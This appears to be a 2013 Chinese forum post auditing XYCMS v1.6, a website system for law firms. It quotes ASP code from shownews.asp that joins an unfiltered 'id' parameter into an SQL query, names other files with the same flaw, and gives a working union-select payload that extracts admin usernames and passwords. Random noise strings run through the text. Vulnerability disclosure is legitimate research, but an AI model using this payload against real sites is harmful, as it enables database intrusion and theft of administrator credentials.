前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
8 Z* B D& p4 C : y k- m4 l3 s& I
淫荡分割线- c) L8 K: H, S7 w9 D, p7 _2 Y
--------------------------------------------------------2 f: _) m" N: X, C
8 \0 g, S- q+ t; l审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)) g. y1 {6 [! [# L( M H- G
源码地址:http://down.chinaz.com/soft/29233.htm
. J1 d9 ?$ K9 p6 Z7 G! C9 X 5 F: u! t* B4 l+ {3 l
漏洞文件:shownews.asp
: o% S# ?4 e& R6 j+ L/ S漏洞代码:7-13行
4 b( L; J$ x M. ~9 Z7 D t6 p , d. Q5 x% t& U- O% K
: w8 v6 @; e$ m: d
<%
6 z! Y9 a: G$ {id=request.QueryString("id")! h6 v3 _1 U6 ?5 U. ~
% e+ @" W; C6 u& \
set snews=server.createobject("adodb.recordset")
/ ?, F" N$ g) n# k: bexec="select * from [news] where id="&id
+ ]+ s" m. V% {' Usnews.open exec,conn,1,11 l8 U8 ?- d( |0 P
%>
/ T6 W: {* i# L
: K4 D) o. b. f) k: X$ w' q
& T4 y) W! E$ }1 \4 s% I. `什么过滤都没有 直造成注入) _9 F, Q5 S, x: a6 N" ~
9 L, Y+ U7 x9 N; G注入点:http://127.0.0.1:99/shownews.asp?id=xx. C* V g/ N6 a' H
- O) w& R- u: [: H3 p+ F- y
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找$ f5 ]" R8 }+ f r* C
; d/ l& m- D& W9 A' [5 |
9 M4 l& t& b& L: _exp: union select 1,admin,password,4,5,7 from admin_user/ J! A/ m% D* o* Y u" }; M, l e
; X) z; _2 @9 H3 H4 u5 `5 Z% M |
发表于 2013-4-4 17:28:12
收藏
支持
反对